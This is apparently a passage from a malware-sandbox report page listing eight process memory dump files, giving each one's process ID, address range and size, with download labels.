memory/4552-128-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4828-144-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4828-129-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4828-130-0x0000025AF1F40000-0x0000025AF1F50000-memory.dmp

Filesize
64KB

Download
memory/4904-127-0x00000228444A0000-0x00000228444B0000-memory.dmp

Filesize
64KB

Download
memory/4904-126-0x00000228444A0000-0x00000228444B0000-memory.dmp

Filesize
64KB

Download
memory/4904-125-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4904-142-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download